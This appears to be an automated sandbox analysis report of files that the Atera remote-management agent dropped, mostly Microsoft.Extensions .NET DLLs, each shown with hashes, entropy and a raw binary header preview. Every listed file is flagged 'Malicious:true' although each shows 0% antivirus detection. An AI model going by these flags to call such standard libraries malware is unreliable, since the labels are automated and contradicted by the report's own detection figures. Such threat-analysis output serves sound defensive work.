                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K.$..........." ..0..,...........K... ...`....... ..............................Y2....`.................................uK..O....`...............6..P(..........XJ..T............................................ ............... ..H............text....+... ...,.................. ..`.rsrc........`......................@..@.reloc...............4..............@..B.................K......H........%...............B.......I........................................(....*^.(.......(...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.EnvironmentVariables.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):19536
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.730237218870487
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ssGu6f0Ux3STFWUQeWiNyb8E9VF6IYijSJIVx/HyZr:ssGuWRTiEpYi606J
                                                                                                                                                                                                                                                                                              MD5:D5B282AA4788540C2FB0FBC9902649E1
                                                                                                                                                                                                                                                                                              SHA1:2439B443C6568BAACB95C2E67968F5FEABE92E18
                                                                                                                                                                                                                                                                                              SHA-256:3F11122AE5F99C29275057D92E4611D4F0611ED7FF7CC2DDC7FF50714462A241
                                                                                                                                                                                                                                                                                              SHA-512:3510BFE7F4DB4B63AC0026ACFF88672AEA82B96AB57D966E718F9FB095915C647B255B8BD02F5CA4D79FA19BA342153692F0760A3FC142CC1C233E4DC03C30DD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3Y..........." ..0.............~8... ...@....... ....................................`.................................+8..O....@...............$..P(...`.......6..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................_8......H........"......................|6......................................:.s....o....&.*V.s....%.o....o....&.*"..(...+*J.(.....~....}....*^.(......%-.&~....}....*2.(....(....*..(....o....r...p.{....r...p(....*.0../.......(....s......o.....8.....o.......(....t ........r...p.o ...,.r...p..r7..p..+n.re..p.o ...,.re..p..r...p..+P.r...p.o ...,.r...p..r...p..+2.r...p.o ...,.r...p..+....(......(!...t ...(....+N...o"...o#...(.......r...p.($.....(!...t ...(......,...r...p.r...p(%.....(

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.FileExtensions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27216
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.552210662146974
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:EY5JfZB7plLDwLx0umTZXA/XABRfhzWqr6WBNyb8E9VF6IYijSJIVxeB8eu74u5O:lrd8Y0wRhz5EpYi60eXIE
                                                                                                                                                                                                                                                                                              MD5:420ED08E70F259AEE9353E4C9B51D392
                                                                                                                                                                                                                                                                                              SHA1:BEFE42898F0FE7713325A2F923524C19DA2E646E
                                                                                                                                                                                                                                                                                              SHA-256:1C0DCEA5EA2D00EB689E8498727027E13BFCE4224EC92040AB55ACBB663A46FE
                                                                                                                                                                                                                                                                                              SHA-512:9874FC1D5A162BC92F2006793CF5431A82AC21D8F27458004C2E99A9D1E504B50C6431A27DC26A84489BDA5D1C8ED9A1BA53EC7F10B3440C201BF36F8CDD7203
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<d..........." ..0..8...........V... ...`....... ..............................vk....`.................................?V..O....`...............B..P(...........U..T............................................ ............... ..H............text....6... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B................sV......H.......P(...&..........lN..0....T........................................(....*^.(.......,...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):26704
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.558340768117845
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:AI2/cK/FWwbGXC8e1lje1l6RWkb2WmNyb8E9VF6IYijSJIVxEtI:AI2/cqFWwSl6hXGEpYi60t
                                                                                                                                                                                                                                                                                              MD5:85A89861DE331E9F0BEAC235187512BE
                                                                                                                                                                                                                                                                                              SHA1:00973F441FE6278AEE21DAED8811D05383356F50
                                                                                                                                                                                                                                                                                              SHA-256:418F2A8936A03E968ABB72DB0FBF4005F0B60D1BADAF1F121DC45855F71EBF4C
                                                                                                                                                                                                                                                                                              SHA-512:9844272DC89D8A9A5851ED17551822D7DEC6430C180EBD98BB7A73463E44869C168FF0CD110596272589AE73C968AE4B1489734EFB449E34EE306E285B894CC3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^............" ..0..6...........T... ...`....... ....................................`................................./T..O....`..l............@..P(.......... S..T............................................ ............... ..H............text....4... ...6.................. ..`.rsrc...l....`.......8..............@..@.reloc...............>..............@..B................cT......H.......|'..t#...........J.......R........................................(....*^.(.......6...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..( ...*.*.(....,.r...p......%...%...(....*...(!...*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.UserSecrets.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25680
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.505889105423614
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:nw6kebL1iFn6d6E1oE1LdAAW9ACWDNyb8E9VF6IYijSJIVxvcTERE:xZbcWusrEpYi60m
                                                                                                                                                                                                                                                                                              MD5:6D9218D0B9D5E103BA0FE7E9DB975F7F
                                                                                                                                                                                                                                                                                              SHA1:2F661F39C09925555375942A5D80A015F556E8B0
                                                                                                                                                                                                                                                                                              SHA-256:7F6BED28E99D475E90160AC74CE81AED6CBCE8F67F475E73AE66DF13E92B4AE2
                                                                                                                                                                                                                                                                                              SHA-512:774381BCF9B344AF16AF8F3A374F1A5C8B381B0C3FE8806BF6AEB0B4773F42FBDC0A869C03A5B213B440F6C0AE8CC948EB17FC31E6B991FA15EEB3B6FBE71D80
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z..........." ..0..2..........6P... ...`....... ....................................`..................................O..O....`...............<..P(...........N..T............................................ ............... ..H............text...<0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................P......H.......x%..d............C..h...DN........................................(....*^.(.......!...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):37456
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.448738986499155
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:4i4PV4eWxaVsQLqyCekI/q/xGljnEpYi60kmub:4aVxa2QXUxajA763db
                                                                                                                                                                                                                                                                                              MD5:57D7440298C07A43F1FEFE0BAC5FCC43
                                                                                                                                                                                                                                                                                              SHA1:82A9581F06E3FCBFED42A39E85EA83CCEE8FD48E
                                                                                                                                                                                                                                                                                              SHA-256:690F1D74CF5A652D988233991B0D1702B84E7EBAEEFF56A071877CF0C31D060B
                                                                                                                                                                                                                                                                                              SHA-512:76F990B7A6ACAD8F592FEA9E0B802B4B227A15EDE072BA87B57154F339873C61C576BFA4F9FEF1307A8BED5269C32F28EFABA9C039EE895F79B2B26D91F25D93
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..`............... ........... ...............................X....`..................................~..O....................j..P(...........}..T............................................ ............... ..H............text... _... ...`.................. ..`.rsrc................b..............@..@.reloc...............h..............@..B.................~......H.......@6..p@...........v......@}........................................(....*^.(.......8...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o ......&...*...................0...........(.......(!...-..,..*.*.(....,.r...p......%...%...("...*..(#...*.(....,.r...p......%...%...%...("...*...($...*.(....,!r...p......%...%...%...%...("...*....(%...*..,&(....,..r...pr...p.("...(&...*..('...*.*.(....,.r...p......%...%...("...*...((...*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44624
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.259394998120094
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:/8+cxuPn//hpz2XCkCkCdvAb4b4qox06OoV0F8l0HCTpw0wo0emWEpYi60s+:k+cxuPn/bvvE0Q0HCNfBsX76P+
                                                                                                                                                                                                                                                                                              MD5:B90E964326DE0C8B88FEC1B41E37BE3A
                                                                                                                                                                                                                                                                                              SHA1:5FA376EFF79CB42669A7D8336494C06A3CCE157D
                                                                                                                                                                                                                                                                                              SHA-256:42D911959EEAA89203052A878A7F68E847E487E967F418C9C6904E956BE22FCF
                                                                                                                                                                                                                                                                                              SHA-512:D3F9A84E3BB06E1C72EE9691988DDE62A105FD07EAB17B22A59A69F8F7A7DA54734BF8633D9DD92E24F094F908B4BE61154627F391338F9F60FE1D15094C4651
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9t............" ..0..z............... ........... ...............................2....`.....................................O.......................P(..............T............................................ ............... ..H............text....z... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B.......................H........>...M..............H.............................................(....*^.(.......B...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......( ...-..,..*.*.(....,.r...p......%...%...(!...*..("...*.(....,.r...p......%...%...%...(!...*...(#...*.(....,!r...p......%...%...%...%...(!...*....($...*..,&(....,..r...pr...p.(!...(%...*..(&...*.*.(....,.r...p......%...%...(!...*...('...*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):82512
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2802579422578315
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:/NLmvi666OjIX0h9zMPvHBWCaRweUG4DynjEZnBU76g:J66fjLb8vH0CiUG4DyneBUr
                                                                                                                                                                                                                                                                                              MD5:EEDAB98D5F5A53C61ECFF3DCA033B5B1
                                                                                                                                                                                                                                                                                              SHA1:AA04C41DA7B0B85F9E1FAF797E2FA48C9D7F9F9C
                                                                                                                                                                                                                                                                                              SHA-256:5F0E0CBEAE8F88516A9CF9991AC7B2A86B6135214B5F0DABF9312919AB33AFF7
                                                                                                                                                                                                                                                                                              SHA-512:12BA31C5A55EBFC392B2C5916DAB4A5C25DCB2EDBCF3B9CCCAF7F9841FE31EB45A45B927F69ED90C5DA9C13C32F61500136004245563D0DA2C5D1C44377F1AD5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.............N.... ...@....... ...............................8....`..................................-..O....@..................P(...`.......,..T............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................-.......H.......pj.............@...0...p,........................................(#...*^.(#......p...%...}....*:.(#.....}....*:.(#.....}....*:.(#.....}....*.~....*.0..........(....,..*..(.....o$......&...*...................0...........(.......(%...-..,..*.*.(....,.r...p......%...%...(&...*..('...*.(....,.r...p......%...%...%...(&...*...((...*.(....,!r...p......%...%...%...%...(&...*....()...*..,&(....,..r...pr...p.(&...(*...*..(+...*.*.(....,.r...p......%...%...(&...*...(,...*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22096
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.571092050997703
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:TlfkJv/RYTWl6+MTxMufuMc8CWsbhWNNyb8E9VF6IYijSJIVxU3iFZb:TlcJnRYTwIjJ66EpYi60tZb
                                                                                                                                                                                                                                                                                              MD5:EAAA8C11C7D2A7AB2593E00D669FFCDF
                                                                                                                                                                                                                                                                                              SHA1:672037C7C38474C9F53815FC3C9E2925E9404DBE
                                                                                                                                                                                                                                                                                              SHA-256:CF9DC1C970C7E6BD70A139E4BBC591FA1A97A3DF382C86E806A9F1B3271AF551
                                                                                                                                                                                                                                                                                              SHA-512:2920F77C47E2A3FAB5760DCADBDF3ED68D09B81ED46CB16469CEC367B4EAF6842B0F9918B99E7BE09788C8D817FAD9B3A52402DEA20383D6832D69CFF5209C87
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.."..........r@... ...`....... ..............................wv....`..................................@..O....`..................P(...........?..T............................................ ............... ..H............text...x ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............,..............@..B................S@......H.......T#..............H:..@....>.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Physical.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):43600
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.434975332952962
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:qHxWCQ4MPJG3cOeeapdUgsWflN+Qu5sEpYi60b:qHxW58re3pdUqN5u5l76+
                                                                                                                                                                                                                                                                                              MD5:D2419C8E9CEE2128F892BAE0334A37E5
                                                                                                                                                                                                                                                                                              SHA1:86EF28CFDA0821E7B426B7451ED348E1C077095D
                                                                                                                                                                                                                                                                                              SHA-256:F3BE4F0128FCCEB85499F5AD3463929AE8E93C0A075A569E1B25BFE88F63A234
                                                                                                                                                                                                                                                                                              SHA-512:018BB02E7E783CA1B0B2341319494285CA9B0699261A89E0CF15D7165D1757EED559A2BCD7E25E6C7204097312F70A840CA3051C4459732BC3616BB8C771B9A1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8..........." ..0..x............... ........... ..............................v.....`.................................g...O.......p...............P(..........X...T............................................ ............... ..H............text....v... ...x.................. ..`.rsrc...p............z..............@..@.reloc..............................@..B........................H........:...P...........................................................(....*^.(.......O...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..( ...*.(....,.r...p......%...%...%...(....*...(!...*.(....,!r...p......%...%...%...%...(....*....("...*..,&(....,..r...pr...p.(....(#...*..($...*.*.(....,.r...p......%...%...(....*...(%...*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileSystemGlobbing.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45136
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.354947891419325
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:qlwMU3jMMSPNueKQWjRUILOK2Ksf/qSCgHgUsJ5EpYi605:quMUJqLWjRHFtsHqSCgHgUsJC768
                                                                                                                                                                                                                                                                                              MD5:9A677FB8A444488A7887BE910598539E
                                                                                                                                                                                                                                                                                              SHA1:F9470CA9A9BC0C971425668106F0811B3615071E
                                                                                                                                                                                                                                                                                              SHA-256:827DBA0A8A6592252544374CF0891EB71BDBB419646DF8FAE38327F7FC6452E0
                                                                                                                                                                                                                                                                                              SHA-512:B82690A85ED969F553EEE3E973D9EFB53FB7B96104BF59626B11D389D4BCA62D01118A2F9DD1690EE248CD2C048AC99F128188694CDC878CBB5B324CCDE8C41B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?.:..........." ..0..~............... ........... ...................................`.....................................O.......H...............P(..............T............................................ ............... ..H............text....|... ...~.................. ..`.rsrc...H...........................@..@.reloc..............................@..B.......................H........C...O..........H.......8.........................................(....*^.(.......9...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o ......&...*...................0...........(.......(!...-..,..*.*.(....,.r...p......%...%...("...*..(#...*.(....,.r...p......%...%...%...("...*...($...*.(....,!r...p......%...%...%...%...("...*....(%...*..,&(....,..r...pr...p.("...(&...*..('...*.*.(....,.r...p......%...%...("...*...((...*.(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):28752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.563026480365638
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:nfGp7YacaEaVNbG12flBF76euwMw0tXXVfFQkzsG9kni7QXRdQWibdW/Nyb8E9Vg:VwVNz9BF76ejMbmHXRQEEpYi608
                                                                                                                                                                                                                                                                                              MD5:0B53E20335B2F60BEA3A24F521C3722D
                                                                                                                                                                                                                                                                                              SHA1:8BDC869C12CDC878C6FB48AB6E23C3621B45C5AE
                                                                                                                                                                                                                                                                                              SHA-256:4C67D8989C89C4553ADAD3854DD78392B046A1ABCDC6A27163144FAB16BEAF0B
                                                                                                                                                                                                                                                                                              SHA-512:5E093C26B492D961A4D6C32A5933BBB6F697C1826A08FA26DA8BB1F7E5C1625E5E84EA51BCAC13E5AFEBCD928AD8E7DFD0BF6D35C2B8846F41B2298CEF8E29CB
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+............" ..0..>...........]... ...`....... ...............................>....`..................................]..O....`..8............H..P(...........\..T............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...8....`.......@..............@..@.reloc...............F..............@..B.................]......H.......p,.../...................\......................................:.(......}....*..{....*6.(...+(.....*:..(...+(.....*..{....*.0..J.......... ...%... ...(....}.......{....o....o....}.....{....o....,..{....*( ...*...0..?.........(!...}"......}#......}$......}!.....|".....(...+..|"...(#...*F.{....%-.&*($...*..(%...*~r...p.....r...p.....r)..p.....*~r...p.....r...p.....r)..p.....*v.(%.....%-.&r?..ps&...z}....*..{....*"..}....*..{....*"..}....*..{....*~rU..p.....ru..p.....r.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):56400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.30415225033415
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:sBu8CE7AFg+0ITvhADGmnnbaTfP63+R3u9q09ePEpYi608LAed:scfWA2+DjaD/nnba+3uwq09eo76vNd
                                                                                                                                                                                                                                                                                              MD5:942F74ACE0A1AD5D7FB33396775886CF
                                                                                                                                                                                                                                                                                              SHA1:44176E149A2E636B07C5337DC2436058D3482941
                                                                                                                                                                                                                                                                                              SHA-256:332C188781DB51141C21FDA8856A7B5B72869F2BCDA9F15E16A443A9D7AAAA89
                                                                                                                                                                                                                                                                                              SHA-512:26C3D2E31242CC805F425226D2EC28CA2C2C89079F3C3A7BD9C91A42CB62CAF9CBB3D2605E49F2AA6B0271B9FA9C823E004383454760EE8E78D601108BFCABFA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................... ............`.................................=...O.......................P(..........L...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................q.......H........G..Tu..........................................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...( ...*.(....,!r...p......%...%...%...%...(....*....(!...*..,&(....,..r...pr...p.(....("...*..(#...*.*.(....,.r...p......%...%...(....*...($...*.(....,.r...p......%...%...%...(....*....(%...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Abstractions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
